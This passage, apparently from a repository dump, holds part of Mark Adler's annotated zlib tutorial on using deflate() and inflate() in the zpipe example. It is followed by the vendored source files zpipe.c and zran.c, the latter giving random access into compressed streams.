            strm.avail_out = CHUNK;
            strm.next_out = out;
Now we call the compression engine itself, deflate(). It takes as many of the avail_in bytes at next_in as it can process, and writes as many as avail_out bytes to next_out. Those counters and pointers are then updated past the input data consumed and the output data written. It is the amount of output space available that may limit how much input is consumed. Hence the inner loop to make sure that all of the input is consumed by providing more output space each time. Since avail_in and next_in are updated by deflate(), we don't have to mess with those between deflate() calls until it's all used up.

The parameters to deflate() are a pointer to the strm structure containing the input and output information and the internal compression engine state, and a parameter indicating whether and how to flush data to the output. Normally deflate will consume several K bytes of input data before producing any output (except for the header), in order to accumulate statistics on the data for optimum compression. It will then put out a burst of compressed data, and proceed to consume more input before the next burst. Eventually, deflate() must be told to terminate the stream, complete the compression with provided input data, and write out the trailer check value. deflate() will continue to compress normally as long as the flush parameter is Z_NO_FLUSH. Once the Z_FINISH parameter is provided, deflate() will begin to complete the compressed output stream. However depending on how much output space is provided, deflate() may have to be called several times until it has provided the complete compressed stream, even after it has consumed all of the input. The flush parameter must continue to be Z_FINISH for those subsequent calls.

There are other values of the flush parameter that are used in more advanced applications. You can force deflate() to produce a burst of output that encodes all of the input data provided so far, even if it wouldn't have otherwise, for example to control data latency on a link with compressed data. You can also ask that deflate() do that as well as erase any history up to that point so that what follows can be decompressed independently, for example for random access applications. Both requests will degrade compression by an amount depending on how often such requests are made.

deflate() has a return value that can indicate errors, yet we do not check it here. Why not? Well, it turns out that deflate() can do no wrong here. Let's go through deflate()'s return values and dispense with them one by one. The possible values are Z_OK, Z_STREAM_END, Z_STREAM_ERROR, or Z_BUF_ERROR. Z_OK is, well, ok. Z_STREAM_END is also ok and will be returned for the last call of deflate(). This is already guaranteed by calling deflate() with Z_FINISH until it has no more output. Z_STREAM_ERROR is only possible if the stream is not initialized properly, but we did initialize it properly. There is no harm in checking for Z_STREAM_ERROR here, for example to check for the possibility that some other part of the application inadvertently clobbered the memory containing the zlib state. Z_BUF_ERROR will be explained further below, but suffice it to say that this is simply an indication that deflate() could not consume more input or produce more output. deflate() can be called again with more output space or more available input, which it will be in this code. 


            ret = deflate(&strm, flush);    /* no bad return value */
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
Now we compute how much output deflate() provided on the last call, which is the difference between how much space was provided before the call, and how much output space is still available after the call. Then that data, if any, is written to the output file. We can then reuse the output buffer for the next call of deflate(). Again if there is a file i/o error, we call deflateEnd() before returning to avoid a memory leak. 

            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)deflateEnd(&strm);
                return Z_ERRNO;
            }
The inner do-loop is repeated until the last deflate() call fails to fill the provided output buffer. Then we know that deflate() has done as much as it can with the provided input, and that all of that input has been consumed. We can then fall out of this loop and reuse the input buffer.

The way we tell that deflate() has no more output is by seeing that it did not fill the output buffer, leaving avail_out greater than zero. However suppose that deflate() has no more output, but just so happened to exactly fill the output buffer! avail_out is zero, and we can't tell that deflate() has done all it can. As far as we know, deflate() has more output for us. So we call it again. But now deflate() produces no output at all, and avail_out remains unchanged as CHUNK. That deflate() call wasn't able to do anything, either consume input or produce output, and so it returns Z_BUF_ERROR. (See, I told you I'd cover this later.) However this is not a problem at all. Now we finally have the desired indication that deflate() is really done, and so we drop out of the inner loop to provide more input to deflate().

With flush set to Z_FINISH, this final set of deflate() calls will complete the output stream. Once that is done, subsequent calls of deflate() would return Z_STREAM_ERROR if the flush parameter is not Z_FINISH, and do no more processing until the state is reinitialized.

Some applications of zlib have two loops that call deflate() instead of the single inner loop we have here. The first loop would call without flushing and feed all of the data to deflate(). The second loop would call deflate() with no more data and the Z_FINISH parameter to complete the process. As you can see from this example, that can be avoided by simply keeping track of the current flush state. 


        } while (strm.avail_out == 0);
        assert(strm.avail_in == 0);     /* all input will be used */
Now we check to see if we have already processed all of the input file. That information was saved in the flush variable, so we see if that was set to Z_FINISH. If so, then we're done and we fall out of the outer loop. We're guaranteed to get Z_STREAM_END from the last deflate() call, since we ran it until the last chunk of input was consumed and all of the output was generated. 

        /* done when last data in file processed */
    } while (flush != Z_FINISH);
    assert(ret == Z_STREAM_END);        /* stream will be complete */
The process is complete, but we still need to deallocate the state to avoid a memory leak (or rather more like a memory hemorrhage if you didn't do this). Then finally we can return with a happy return value. 

    /* clean up and return */
    (void)deflateEnd(&strm);
    return Z_OK;
}
Now we do the same thing for decompression in the inf() routine. inf() decompresses what is hopefully a valid zlib stream from the input file and writes the uncompressed data to the output file. Much of the discussion above for def() applies to inf() as well, so the discussion here will focus on the differences between the two. 

/* Decompress from file source to file dest until stream ends or EOF.
   inf() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_DATA_ERROR if the deflate data is
   invalid or incomplete, Z_VERSION_ERROR if the version of zlib.h and
   the version of the library linked do not match, or Z_ERRNO if there
   is an error reading or writing the files. */
int inf(FILE *source, FILE *dest)
{
The local variables have the same functionality as they do for def(). The only difference is that there is no flush variable, since inflate() can tell from the zlib stream itself when the stream is complete. 

    int ret;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];
The initialization of the state is the same, except that there is no compression level, of course, and two more elements of the structure are initialized. avail_in and next_in must be initialized before calling inflateInit(). This is because the application has the option to provide the start of the zlib stream in order for inflateInit() to have access to information about the compression method to aid in memory allocation. In the current implementation of zlib (up through versions 1.2.x), the method-dependent memory allocations are deferred to the first call of inflate() anyway. However those fields must be initialized since later versions of zlib that provide more compression methods may take advantage of this interface. In any case, no decompression is performed by inflateInit(), so the avail_out and next_out fields do not need to be initialized before calling.

Here avail_in is set to zero and next_in is set to Z_NULL to indicate that no input data is being provided. 


    /* allocate inflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit(&strm);
    if (ret != Z_OK)
        return ret;
The outer do-loop decompresses input until inflate() indicates that it has reached the end of the compressed data and has produced all of the uncompressed output. This is in contrast to def() which processes all of the input file. If end-of-file is reached before the compressed data self-terminates, then the compressed data is incomplete and an error is returned. 

    /* decompress until deflate stream ends or end of file */
    do {
We read input data and set the strm structure accordingly. If we've reached the end of the input file, then we leave the outer loop and report an error, since the compressed data is incomplete. Note that we may read more data than is eventually consumed by inflate(), if the input file continues past the zlib stream. For applications where zlib streams are embedded in other data, this routine would need to be modified to return the unused data, or at least indicate how much of the input data was not used, so the application would know where to pick up after the zlib stream. 

        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            (void)inflateEnd(&strm);
            return Z_ERRNO;
        }
        if (strm.avail_in == 0)
            break;
        strm.next_in = in;
The inner do-loop has the same function it did in def(), which is to keep calling inflate() until has generated all of the output it can with the provided input. 

        /* run inflate() on input until output buffer not full */
        do {
Just like in def(), the same output space is provided for each call of inflate(). 

            strm.avail_out = CHUNK;
            strm.next_out = out;
Now we run the decompression engine itself. There is no need to adjust the flush parameter, since the zlib format is self-terminating. The main difference here is that there are return values that we need to pay attention to. Z_DATA_ERROR indicates that inflate() detected an error in the zlib compressed data format, which means that either the data is not a zlib stream to begin with, or that the data was corrupted somewhere along the way since it was compressed. The other error to be processed is Z_MEM_ERROR, which can occur since memory allocation is deferred until inflate() needs it, unlike deflate(), whose memory is allocated at the start by deflateInit().

Advanced applications may use deflateSetDictionary() to prime deflate() with a set of likely data to improve the first 32K or so of compression. This is noted in the zlib header, so inflate() requests that that dictionary be provided before it can start to decompress. Without the dictionary, correct decompression is not possible. For this routine, we have no idea what the dictionary is, so the Z_NEED_DICT indication is converted to a Z_DATA_ERROR.

inflate() can also return Z_STREAM_ERROR, which should not be possible here, but could be checked for as noted above for def(). Z_BUF_ERROR does not need to be checked for here, for the same reasons noted for def(). Z_STREAM_END will be checked for later. 


            ret = inflate(&strm, Z_NO_FLUSH);
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
            switch (ret) {
            case Z_NEED_DICT:
                ret = Z_DATA_ERROR;     /* and fall through */
            case Z_DATA_ERROR:
            case Z_MEM_ERROR:
                (void)inflateEnd(&strm);
                return ret;
            }
The output of inflate() is handled identically to that of deflate(). 

            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)inflateEnd(&strm);
                return Z_ERRNO;
            }
The inner do-loop ends when inflate() has no more output as indicated by not filling the output buffer, just as for deflate(). In this case, we cannot assert that strm.avail_in will be zero, since the deflate stream may end before the file does. 

        } while (strm.avail_out == 0);
The outer do-loop ends when inflate() reports that it has reached the end of the input zlib stream, has completed the decompression and integrity check, and has provided all of the output. This is indicated by the inflate() return value Z_STREAM_END. The inner loop is guaranteed to leave ret equal to Z_STREAM_END if the last chunk of the input file read contained the end of the zlib stream. So if the return value is not Z_STREAM_END, the loop continues to read more input. 

        /* done when inflate() says it's done */
    } while (ret != Z_STREAM_END);
At this point, decompression successfully completed, or we broke out of the loop due to no more data being available from the input file. If the last inflate() return value is not Z_STREAM_END, then the zlib stream was incomplete and a data error is returned. Otherwise, we return with a happy return value. Of course, inflateEnd() is called first to avoid a memory leak. 

    /* clean up and return */
    (void)inflateEnd(&strm);
    return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
That ends the routines that directly use zlib. The following routines make this a command-line program by running data through the above routines from stdin to stdout, and handling any errors reported by def() or inf().

zerr() is used to interpret the possible error codes from def() and inf(), as detailed in their comments above, and print out an error message. Note that these are only a subset of the possible return values from deflate() and inflate(). 


/* report a zlib or i/o error */
void zerr(int ret)
{
    fputs("zpipe: ", stderr);
    switch (ret) {
    case Z_ERRNO:
        if (ferror(stdin))
            fputs("error reading stdin\n", stderr);
        if (ferror(stdout))
            fputs("error writing stdout\n", stderr);
        break;
    case Z_STREAM_ERROR:
        fputs("invalid compression level\n", stderr);
        break;
    case Z_DATA_ERROR:
        fputs("invalid or incomplete deflate data\n", stderr);
        break;
    case Z_MEM_ERROR:
        fputs("out of memory\n", stderr);
        break;
    case Z_VERSION_ERROR:
        fputs("zlib version mismatch!\n", stderr);
    }
}
Here is the main() routine used to test def() and inf(). The zpipe command is simply a compression pipe from stdin to stdout, if no arguments are given, or it is a decompression pipe if zpipe -d is used. If any other arguments are provided, no compression or decompression is performed. Instead a usage message is displayed. Examples are zpipe < foo.txt > foo.txt.z to compress, and zpipe -d < foo.txt.z > foo.txt to decompress. 

/* compress or decompress from stdin to stdout */
int main(int argc, char **argv)
{
    int ret;

    /* avoid end-of-line conversions */
    SET_BINARY_MODE(stdin);
    SET_BINARY_MODE(stdout);

    /* do compression if no arguments */
    if (argc == 1) {
        ret = def(stdin, stdout, Z_DEFAULT_COMPRESSION);
        if (ret != Z_OK)
            zerr(ret);
        return ret;
    }

    /* do decompression if -d specified */
    else if (argc == 2 && strcmp(argv[1], "-d") == 0) {
        ret = inf(stdin, stdout);
        if (ret != Z_OK)
            zerr(ret);
        return ret;
    }

    /* otherwise, report usage */
    else {
        fputs("zpipe usage: zpipe [-d] < source > dest\n", stderr);
        return 1;
    }
}
Last modified 24 January 2023
Copyright © 2004-2023 Mark Adler
Creative Commons License Creative Commons Attribution-NoDerivatives 4.0 International License. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zpipe.c ================================================ /* zpipe.c: example of proper use of zlib's inflate() and deflate() Not copyrighted -- provided to the public domain Version 1.4 11 December 2005 Mark Adler */ /* Version history: 1.0 30 Oct 2004 First version 1.1 8 Nov 2004 Add void casting for unused return values Use switch statement for inflate() return values 1.2 9 Nov 2004 Add assertions to document zlib guarantees 1.3 6 Apr 2005 Remove incorrect assertion in inf() 1.4 11 Dec 2005 Add hack to avoid MSDOS end-of-line conversions Avoid some compiler warnings for input and output buffers */ #include #include #include #include "zlib.h" #if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__) # include # include # define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY) #else # define SET_BINARY_MODE(file) #endif #define CHUNK 16384 /* Compress from file source to file dest until EOF on source. def() returns Z_OK on success, Z_MEM_ERROR if memory could not be allocated for processing, Z_STREAM_ERROR if an invalid compression level is supplied, Z_VERSION_ERROR if the version of zlib.h and the version of the library linked do not match, or Z_ERRNO if there is an error reading or writing the files. */ int def(FILE *source, FILE *dest, int level) { int ret, flush; unsigned have; z_stream strm; unsigned char in[CHUNK]; unsigned char out[CHUNK]; /* allocate deflate state */ strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; ret = deflateInit(&strm, level); if (ret != Z_OK) return ret; /* compress until end of file */ do { strm.avail_in = fread(in, 1, CHUNK, source); if (ferror(source)) { (void)deflateEnd(&strm); return Z_ERRNO; } flush = feof(source) ? Z_FINISH : Z_NO_FLUSH; strm.next_in = in; /* run deflate() on input until output buffer not full, finish compression if all of source has been read in */ do { strm.avail_out = CHUNK; strm.next_out = out; ret = deflate(&strm, flush); /* no bad return value */ assert(ret != Z_STREAM_ERROR); /* state not clobbered */ have = CHUNK - strm.avail_out; if (fwrite(out, 1, have, dest) != have || ferror(dest)) { (void)deflateEnd(&strm); return Z_ERRNO; } } while (strm.avail_out == 0); assert(strm.avail_in == 0); /* all input will be used */ /* done when last data in file processed */ } while (flush != Z_FINISH); assert(ret == Z_STREAM_END); /* stream will be complete */ /* clean up and return */ (void)deflateEnd(&strm); return Z_OK; } /* Decompress from file source to file dest until stream ends or EOF. inf() returns Z_OK on success, Z_MEM_ERROR if memory could not be allocated for processing, Z_DATA_ERROR if the deflate data is invalid or incomplete, Z_VERSION_ERROR if the version of zlib.h and the version of the library linked do not match, or Z_ERRNO if there is an error reading or writing the files. */ int inf(FILE *source, FILE *dest) { int ret; unsigned have; z_stream strm; unsigned char in[CHUNK]; unsigned char out[CHUNK]; /* allocate inflate state */ strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit(&strm); if (ret != Z_OK) return ret; /* decompress until deflate stream ends or end of file */ do { strm.avail_in = fread(in, 1, CHUNK, source); if (ferror(source)) { (void)inflateEnd(&strm); return Z_ERRNO; } if (strm.avail_in == 0) break; strm.next_in = in; /* run inflate() on input until output buffer not full */ do { strm.avail_out = CHUNK; strm.next_out = out; ret = inflate(&strm, Z_NO_FLUSH); assert(ret != Z_STREAM_ERROR); /* state not clobbered */ switch (ret) { case Z_NEED_DICT: ret = Z_DATA_ERROR; /* and fall through */ case Z_DATA_ERROR: case Z_MEM_ERROR: (void)inflateEnd(&strm); return ret; } have = CHUNK - strm.avail_out; if (fwrite(out, 1, have, dest) != have || ferror(dest)) { (void)inflateEnd(&strm); return Z_ERRNO; } } while (strm.avail_out == 0); /* done when inflate() says it's done */ } while (ret != Z_STREAM_END); /* clean up and return */ (void)inflateEnd(&strm); return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR; } /* report a zlib or i/o error */ void zerr(int ret) { fputs("zpipe: ", stderr); switch (ret) { case Z_ERRNO: if (ferror(stdin)) fputs("error reading stdin\n", stderr); if (ferror(stdout)) fputs("error writing stdout\n", stderr); break; case Z_STREAM_ERROR: fputs("invalid compression level\n", stderr); break; case Z_DATA_ERROR: fputs("invalid or incomplete deflate data\n", stderr); break; case Z_MEM_ERROR: fputs("out of memory\n", stderr); break; case Z_VERSION_ERROR: fputs("zlib version mismatch!\n", stderr); } } /* compress or decompress from stdin to stdout */ int main(int argc, char **argv) { int ret; /* avoid end-of-line conversions */ SET_BINARY_MODE(stdin); SET_BINARY_MODE(stdout); /* do compression if no arguments */ if (argc == 1) { ret = def(stdin, stdout, Z_DEFAULT_COMPRESSION); if (ret != Z_OK) zerr(ret); return ret; } /* do decompression if -d specified */ else if (argc == 2 && strcmp(argv[1], "-d") == 0) { ret = inf(stdin, stdout); if (ret != Z_OK) zerr(ret); return ret; } /* otherwise, report usage */ else { fputs("zpipe usage: zpipe [-d] < source > dest\n", stderr); return 1; } } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zran.c ================================================ /* zran.c -- example of deflate stream indexing and random access * Copyright (C) 2005, 2012, 2018, 2023 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h * Version 1.4 13 Apr 2023 Mark Adler */ /* Version History: 1.0 29 May 2005 First version 1.1 29 Sep 2012 Fix memory reallocation error 1.2 14 Oct 2018 Handle gzip streams with multiple members Add a header file to facilitate usage in applications 1.3 18 Feb 2023 Permit raw deflate streams as well as zlib and gzip Permit crossing gzip member boundaries when extracting Support a size_t size when extracting (was an int) Do a binary search over the index for an access point Expose the access point type to enable save and load 1.4 13 Apr 2023 Add a NOPRIME define to not use inflatePrime() */ // Illustrate the use of Z_BLOCK, inflatePrime(), and inflateSetDictionary() // for random access of a compressed file. A file containing a raw deflate // stream is provided on the command line. The compressed stream is decoded in // its entirety, and an index built with access points about every SPAN bytes // in the uncompressed output. The compressed file is left open, and can then // be read randomly, having to decompress on the average SPAN/2 uncompressed // bytes before getting to the desired block of data. // // An access point can be created at the start of any deflate block, by saving // the starting file offset and bit of that block, and the 32K bytes of // uncompressed data that precede that block. Also the uncompressed offset of // that block is saved to provide a reference for locating a desired starting // point in the uncompressed stream. deflate_index_build() decompresses the // input raw deflate stream a block at a time, and at the end of each block // decides if enough uncompressed data has gone by to justify the creation of a // new access point. If so, that point is saved in a data structure that grows // as needed to accommodate the points. // // To use the index, an offset in the uncompressed data is provided, for which // the latest access point at or preceding that offset is located in the index. // The input file is positioned to the specified location in the index, and if // necessary the first few bits of the compressed data is read from the file. // inflate is initialized with those bits and the 32K of uncompressed data, and // decompression then proceeds until the desired offset in the file is reached. // Then decompression continues to read the requested uncompressed data from // the file. // // There is some fair bit of overhead to starting inflation for the random // access, mainly copying the 32K byte dictionary. If small pieces of the file // are being accessed, it would make sense to implement a cache to hold some // lookahead to avoid many calls to deflate_index_extract() for small lengths. // // Another way to build an index would be to use inflateCopy(). That would not // be constrained to have access points at block boundaries, but would require // more memory per access point, and could not be saved to a file due to the // use of pointers in the state. The approach here allows for storage of the // index in a file. #include #include #include #include #include "zlib.h" #include "zran.h" #define WINSIZE 32768U // sliding window size #define CHUNK 16384 // file input buffer size // See comments in zran.h. void deflate_index_free(struct deflate_index *index) { if (index != NULL) { free(index->list); free(index); } } // Add an access point to the list. If out of memory, deallocate the existing // list and return NULL. index->mode is temporarily the allocated number of // access points, until it is time for deflate_index_build() to return. Then // index->mode is set to the mode of inflation. static struct deflate_index *add_point(struct deflate_index *index, int bits, off_t in, off_t out, unsigned left, unsigned char *window) { if (index == NULL) { // The list is empty. Create it, starting with eight access points. index = malloc(sizeof(struct deflate_index)); if (index == NULL) return NULL; index->have = 0; index->mode = 8; index->list = malloc(sizeof(point_t) * index->mode); if (index->list == NULL) { free(index); return NULL; } } else if (index->have == index->mode) { // The list is full. Make it bigger. index->mode <<= 1; point_t *next = realloc(index->list, sizeof(point_t) * index->mode); if (next == NULL) { deflate_index_free(index); return NULL; } index->list = next; } // Fill in the access point and increment how many we have. point_t *next = (point_t *)(index->list) + index->have++; if (index->have < 0) { // Overflowed the int! deflate_index_free(index); return NULL; } next->out = out; next->in = in; next->bits = bits; if (left) memcpy(next->window, window + WINSIZE - left, left); if (left < WINSIZE) memcpy(next->window + left, window, WINSIZE - left); // Return the index, which may have been newly allocated or destroyed. return index; } // Decompression modes. These are the inflateInit2() windowBits parameter. #define RAW -15 #define ZLIB 15 #define GZIP 31 // See comments in zran.h. int deflate_index_build(FILE *in, off_t span, struct deflate_index **built) { // Set up inflation state. z_stream strm = {0}; // inflate engine (gets fired up later) unsigned char buf[CHUNK]; // input buffer unsigned char win[WINSIZE] = {0}; // output sliding window off_t totin = 0; // total bytes read from input off_t totout = 0; // total bytes uncompressed int mode = 0; // mode: RAW, ZLIB, or GZIP (0 => not set yet) // Decompress from in, generating access points along the way. int ret; // the return value from zlib, or Z_ERRNO off_t last; // last access point uncompressed offset struct deflate_index *index = NULL; // list of access points do { // Assure available input, at least until reaching EOF. if (strm.avail_in == 0) { strm.avail_in = fread(buf, 1, sizeof(buf), in); totin += strm.avail_in; strm.next_in = buf; if (strm.avail_in < sizeof(buf) && ferror(in)) { ret = Z_ERRNO; break; } if (mode == 0) { // At the start of the input -- determine the type. Assume raw // if it is neither zlib nor gzip. This could in theory result // in a false positive for zlib, but in practice the fill bits // after a stored block are always zeros, so a raw stream won't // start with an 8 in the low nybble. mode = strm.avail_in == 0 ? RAW : // empty -- will fail (strm.next_in[0] & 0xf) == 8 ? ZLIB : strm.next_in[0] == 0x1f ? GZIP : /* else */ RAW; ret = inflateInit2(&strm, mode); if (ret != Z_OK) break; } } // Assure available output. This rotates the output through, for use as // a sliding window on the uncompressed data. if (strm.avail_out == 0) { strm.avail_out = sizeof(win); strm.next_out = win; } if (mode == RAW && index == NULL) // We skip the inflate() call at the start of raw deflate data in // order generate an access point there. Set data_type to imitate // the end of a header. strm.data_type = 0x80; else { // Inflate and update the number of uncompressed bytes. unsigned before = strm.avail_out; ret = inflate(&strm, Z_BLOCK); totout += before - strm.avail_out; } if ((strm.data_type & 0xc0) == 0x80 && (index == NULL || totout - last >= span)) { // We are at the end of a header or a non-last deflate block, so we // can add an access point here. Furthermore, we are either at the // very start for the first access point, or there has been span or // more uncompressed bytes since the last access point, so we want // to add an access point here. index = add_point(index, strm.data_type & 7, totin - strm.avail_in, totout, strm.avail_out, win); if (index == NULL) { ret = Z_MEM_ERROR; break; } last = totout; } if (ret == Z_STREAM_END && mode == GZIP && (strm.avail_in || ungetc(getc(in), in) != EOF)) // There is more input after the end of a gzip member. Reset the // inflate state to read another gzip member. On success, this will // set ret to Z_OK to continue decompressing. ret = inflateReset2(&strm, GZIP); // Keep going until Z_STREAM_END or error. If the compressed data ends // prematurely without a file read error, Z_BUF_ERROR is returned. } while (ret == Z_OK); inflateEnd(&strm); if (ret != Z_STREAM_END) { // An error was encountered. Discard the index and return a negative // error code. deflate_index_free(index); return ret == Z_NEED_DICT ? Z_DATA_ERROR : ret; } // Shrink the index to only the occupied access points and return it. index->mode = mode; index->length = totout; point_t *list = realloc(index->list, sizeof(point_t) * index->have); if (list == NULL) { // Seems like a realloc() to make something smaller should always work, // but just in case. deflate_index_free(index); return Z_MEM_ERROR; } index->list = list; *built = index; return index->have; } #ifdef NOPRIME // Support zlib versions before 1.2.3 (July 2005), or incomplete zlib clones // that do not have inflatePrime(). # define INFLATEPRIME inflatePreface // Append the low bits bits of value to in[] at bit position *have, updating // *have. value must be zero above its low bits bits. bits must be positive. // This assumes that any bits above the *have bits in the last byte are zeros. // That assumption is preserved on return, as any bits above *have + bits in // the last byte written will be set to zeros. static inline void append_bits(unsigned value, int bits, unsigned char *in, int *have) { in += *have >> 3; // where the first bits from value will go int k = *have & 7; // the number of bits already there *have += bits; if (k) *in |= value << k; // write value above the low k bits else *in = value; k = 8 - k; // the number of bits just appended while (bits > k) { value >>= k; // drop the bits appended bits -= k; k = 8; // now at a byte boundary *++in = value; } } // Insert enough bits in the form of empty deflate blocks in front of the the // low bits bits of value, in order to bring the sequence to a byte boundary. // Then feed that to inflate(). This does what inflatePrime() does, except that // a negative value of bits is not supported. bits must be in 0..16. If the // arguments are invalid, Z_STREAM_ERROR is returned. Otherwise the return // value from inflate() is returned. static int inflatePreface(z_stream *strm, int bits, int value) { // Check input. if (strm == Z_NULL || bits < 0 || bits > 16) return Z_STREAM_ERROR; if (bits == 0) return Z_OK; value &= (2 << (bits - 1)) - 1; // An empty dynamic block with an odd number of bits (95). The high bit of // the last byte is unused. static const unsigned char dyn[] = { 4, 0xe0, 0x81, 8, 0, 0, 0, 0, 0x20, 0xa8, 0xab, 0x1f }; const int dynlen = 95; // number of bits in the block // Build an input buffer for inflate that is a multiple of eight bits in // length, and that ends with the low bits bits of value. unsigned char in[(dynlen + 3 * 10 + 16 + 7) / 8]; int have = 0; if (bits & 1) { // Insert an empty dynamic block to get to an odd number of bits, so // when bits bits from value are appended, we are at an even number of // bits. memcpy(in, dyn, sizeof(dyn)); have = dynlen; } while ((have + bits) & 7) // Insert empty fixed blocks until appending bits bits would put us on // a byte boundary. This will insert at most three fixed blocks. append_bits(2, 10, in, &have); // Append the bits bits from value, which takes us to a byte boundary. append_bits(value, bits, in, &have); // Deliver the input to inflate(). There is no output space provided, but // inflate() can't get stuck waiting on output not ingesting all of the // provided input. The reason is that there will be at most 16 bits of // input from value after the empty deflate blocks (which themselves // generate no output). At least ten bits are needed to generate the first // output byte from a fixed block. The last two bytes of the buffer have to // be ingested in order to get ten bits, which is the most that value can // occupy. strm->avail_in = have >> 3; strm->next_in = in; strm->avail_out = 0; strm->next_out = in; // not used, but can't be NULL return inflate(strm, Z_NO_FLUSH); } #else # define INFLATEPRIME inflatePrime #endif // See comments in zran.h. ptrdiff_t deflate_index_extract(FILE *in, struct deflate_index *index, off_t offset, unsigned char *buf, size_t len) { // Do a quick sanity check on the index. if (index == NULL || index->have < 1 || index->list[0].out != 0) return Z_STREAM_ERROR; // If nothing to extract, return zero bytes extracted. if (len == 0 || offset < 0 || offset >= index->length) return 0; // Find the access point closest to but not after offset. int lo = -1, hi = index->have; point_t *point = index->list; while (hi - lo > 1) { int mid = (lo + hi) >> 1; if (offset < point[mid].out) hi = mid; else lo = mid; } point += lo; // Initialize the input file and prime the inflate engine to start there. int ret = fseeko(in, point->in - (point->bits ? 1 : 0), SEEK_SET); if (ret == -1) return Z_ERRNO; int ch = 0; if (point->bits && (ch = getc(in)) == EOF) return ferror(in) ? Z_ERRNO : Z_BUF_ERROR; z_stream strm = {0}; ret = inflateInit2(&strm, RAW); if (ret != Z_OK) return ret; if (point->bits) INFLATEPRIME(&strm, point->bits, ch >> (8 - point->bits)); inflateSetDictionary(&strm, point->window, WINSIZE); // Skip uncompressed bytes until offset reached, then satisfy request. unsigned char input[CHUNK]; unsigned char discard[WINSIZE]; offset -= point->out; // number of bytes to skip to get to offset size_t left = len; // number of bytes left to read after offset do { if (offset) { // Discard up to offset uncompressed bytes. strm.avail_out = offset < WINSIZE ? (unsigned)offset : WINSIZE; strm.next_out = discard; } else { // Uncompress up to left bytes into buf. strm.avail_out = left < UINT_MAX ? (unsigned)left : UINT_MAX; strm.next_out = buf + len - left; } // Uncompress, setting got to the number of bytes uncompressed. if (strm.avail_in == 0) { // Assure available input. strm.avail_in = fread(input, 1, CHUNK, in); if (strm.avail_in < CHUNK && ferror(in)) { ret = Z_ERRNO; break; } strm.next_in = input; } unsigned got = strm.avail_out; ret = inflate(&strm, Z_NO_FLUSH); got -= strm.avail_out; // Update the appropriate count. if (offset) offset -= got; else left -= got; // If we're at the end of a gzip member and there's more to read, // continue to the next gzip member. if (ret == Z_STREAM_END && index->mode == GZIP) { // Discard the gzip trailer. unsigned drop = 8; // length of gzip trailer if (strm.avail_in >= drop) { strm.avail_in -= drop; strm.next_in += drop; } else { // Read and discard the remainder of the gzip trailer. drop -= strm.avail_in; strm.avail_in = 0; do { if (getc(in) == EOF) // The input does not have a complete trailer. return ferror(in) ? Z_ERRNO : Z_BUF_ERROR; } while (--drop); } if (strm.avail_in || ungetc(getc(in), in) != EOF) { // There's more after the gzip trailer. Use inflate to skip the // gzip header and resume the raw inflate there. inflateReset2(&strm, GZIP); do { if (strm.avail_in == 0) { strm.avail_in = fread(input, 1, CHUNK, in); if (strm.avail_in < CHUNK && ferror(in)) { ret = Z_ERRNO; break; } strm.next_in = input; } strm.avail_out = WINSIZE; strm.next_out = discard; ret = inflate(&strm, Z_BLOCK); // stop at end of header } while (ret == Z_OK && (strm.data_type & 0x80) == 0); if (ret != Z_OK) break; inflateReset2(&strm, RAW); } } // Continue until we have the requested data, the deflate data has // ended, or an error is encountered. } while (ret == Z_OK && left); inflateEnd(&strm); // Return the number of uncompressed bytes read into buf, or the error. return ret == Z_OK || ret == Z_STREAM_END ? len - left : ret; } #ifdef TEST #define SPAN 1048576L // desired distance between access points #define LEN 16384 // number of bytes to extract // Demonstrate the use of deflate_index_build() and deflate_index_extract() by // processing the file provided on the command line, and extracting LEN bytes // from 2/3rds of the way through the uncompressed output, writing that to // stdout. An offset can be provided as the second argument, in which case the // data is extracted from there instead. int main(int argc, char **argv) { // Open the input file. if (argc < 2 || argc > 3) { fprintf(stderr, "usage: zran file.raw [offset]\n"); return 1; } FILE *in = fopen(argv[1], "rb"); if (in == NULL) { fprintf(stderr, "zran: could not open %s for reading\n", argv[1]); return 1; } // Get optional offset. off_t offset = -1; if (argc == 3) { char *end; offset = strtoll(argv[2], &end, 10); if (*end || offset < 0) { fprintf(stderr, "zran: %s is not a valid offset\n", argv[2]); return 1; } } // Build index. struct deflate_index *index = NULL; int len = deflate_index_build(in, SPAN, &index); if (len < 0) { fclose(in); switch (len) { case Z_MEM_ERROR: fprintf(stderr, "zran: out of memory\n"); break; case Z_BUF_ERROR: fprintf(stderr, "zran: %s ended prematurely\n", argv[1]); break; case Z_DATA_ERROR: fprintf(stderr, "zran: compressed data error in %s\n", argv[1]); break; case Z_ERRNO: fprintf(stderr, "zran: read error on %s\n", argv[1]); break; default: fprintf(stderr, "zran: error %d while building index\n", len); } return 1; } fprintf(stderr, "zran: built index with %d access points\n", len); // Use index by reading some bytes from an arbitrary offset. unsigned char buf[LEN]; if (offset == -1) offset = ((index->length + 1) << 1) / 3; ptrdiff_t got = deflate_index_extract(in, index, offset, buf, LEN); if (got < 0) fprintf(stderr, "zran: extraction failed: %s error\n", got == Z_MEM_ERROR ? "out of memory" : "input corrupted"); else { fwrite(buf, 1, got, stdout); fprintf(stderr, "zran: extracted %ld bytes at %lld\n", got, offset); } // Clean up and exit. deflate_index_free(index); fclose(in); return 0; } #endif ================================================ FILE: 